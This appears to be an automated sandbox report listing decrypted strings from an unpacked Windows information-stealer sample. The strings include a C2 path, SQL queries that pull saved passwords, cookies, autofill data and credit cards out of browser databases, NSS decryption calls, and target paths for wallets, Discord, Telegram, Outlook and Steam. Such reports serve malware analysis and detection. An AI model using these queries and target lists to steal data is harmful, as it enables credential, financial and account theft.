                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: /562c1eb14955c897.php
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: /4bdcdc3545a160aa/
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: LogsDiller
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetEnvironmentVariableA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetFileAttributesA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GlobalLock
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HeapFree
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetFileSize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GlobalSize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateToolhelp32Snapshot
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: IsWow64Process
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Process32Next
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetLocalTime
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: FreeLibrary
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetTimeZoneInformation
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetSystemPowerStatus
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetVolumeInformationA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetWindowsDirectoryA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Process32First
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetLocaleInfoA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetUserDefaultLocaleName
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetModuleFileNameA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DeleteFileA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: FindNextFileA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: LocalFree
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: FindClose
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SetEnvironmentVariableA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: LocalAlloc
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetFileSizeEx
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ReadFile
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SetFilePointer
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: WriteFile
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateFileA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: FindFirstFileA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CopyFileA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: VirtualProtect
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetLastError
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: lstrcpynA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: MultiByteToWideChar
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GlobalFree
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: WideCharToMultiByte
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GlobalAlloc
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: OpenProcess
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: TerminateProcess
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetCurrentProcessId
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: gdiplus.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ole32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: bcrypt.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: wininet.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: shlwapi.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: shell32.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: psapi.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: rstrtmgr.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateCompatibleBitmap
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SelectObject
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BitBlt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DeleteObject
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateCompatibleDC
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipGetImageEncodersSize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipGetImageEncoders
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdiplusStartup
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdiplusShutdown
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipSaveImageToStream
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipDisposeImage
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GdipFree
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetHGlobalFromStream
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CreateStreamOnHGlobal
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CoUninitialize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CoInitialize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CoCreateInstance
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptDecrypt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptSetProperty
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptDestroyKey
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetWindowRect
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetDesktopWindow
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetDC
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CloseWindow
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: wsprintfA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: EnumDisplayDevicesA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetKeyboardLayoutList
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CharToOemW
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: wsprintfW
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RegQueryValueExA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RegEnumKeyExA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RegOpenKeyExA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RegCloseKey
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RegEnumValueA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CryptBinaryToStringA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CryptUnprotectData
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SHGetFolderPathA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ShellExecuteExA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetOpenUrlA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetConnectA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetCloseHandle
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetOpenA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HttpSendRequestA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HttpOpenRequestA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetReadFile
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: InternetCrackUrlA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: StrCmpCA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: StrStrA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: StrCmpCW
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PathMatchSpecA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: GetModuleFileNameExA
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RmStartSession
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RmRegisterResources
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RmGetList
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: RmEndSession
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_open
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_prepare_v2
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_step
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_column_text
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_finalize
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_close
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_column_bytes
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: sqlite3_column_blob
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: encrypted_key
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PATH
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: NSS_Init
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: NSS_Shutdown
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PK11_FreeSlot
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PK11_Authenticate
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: PK11SDR_Decrypt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: C:\ProgramData\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: browser:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: profile:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: url:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: login:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: password:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Opera
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: OperaGX
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Network
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: cookies
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: .txt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: TRUE
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: FALSE
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: autofill
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT name, value FROM autofill
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: history
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: cc
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: name:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: month:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: year:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: card:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Cookies
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Login Data
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Web Data
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: History
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: logins.json
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: formSubmitURL
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: usernameField
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: encryptedUsername
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: encryptedPassword
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: guid
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: cookies.sqlite
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: formhistory.sqlite
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: places.sqlite
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: plugins
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Local Extension Settings
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Sync Extension Settings
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: IndexedDB
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Opera Stable
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Opera GX Stable
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: CURRENT
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: chrome-extension_
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Local State
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: profiles.ini
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: chrome
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: opera
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: firefox
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: wallets
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %08lX%04lX%lu
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ProductName
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: x32
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: x64
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ProcessorNameString
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DisplayName
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DisplayVersion
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Network Info:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - IP: IP?
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Country: ISO?
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: System Summary:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - HWID:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - OS:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Architecture:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - UserName:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Computer Name:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Local Time:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - UTC:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Language:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Keyboards:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Laptop:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Running Path:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - CPU:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Threads:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Cores:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - RAM:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - Display Resolution:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: - GPU:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: User Agents:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Installed Apps:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: All Users:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Current User:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Process List:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: system_info.txt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: freebl3.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: mozglue.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: msvcp140.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: nss3.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: softokn3.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: vcruntime140.dll
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Temp\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: .exe
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: runas
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: open
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: /c start
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %DESKTOP%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %APPDATA%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %LOCALAPPDATA%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %USERPROFILE%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %DOCUMENTS%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %PROGRAMFILES%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: %RECENT%
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: *.lnk
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: files
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \discord\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Local Storage\leveldb
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Telegram Desktop\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: key_datas
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: map*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: F8806DD0C461824F*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Telegram
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Tox
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: *.tox
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: *.ini
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Password
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 00000001
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 00000002
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 00000003
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: 00000004
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \Outlook\accounts.txt
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Pidgin
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \.purple\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: accounts.xml
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: dQw4w9WgXcQ
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: token:
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: Software\Valve\Steam
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: SteamPath
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: \config\
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: ssfn*
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: config.vdf
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DialogConfig.vdf
                    Source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpackString decryptor: DialogConfigOverlay*.vdf
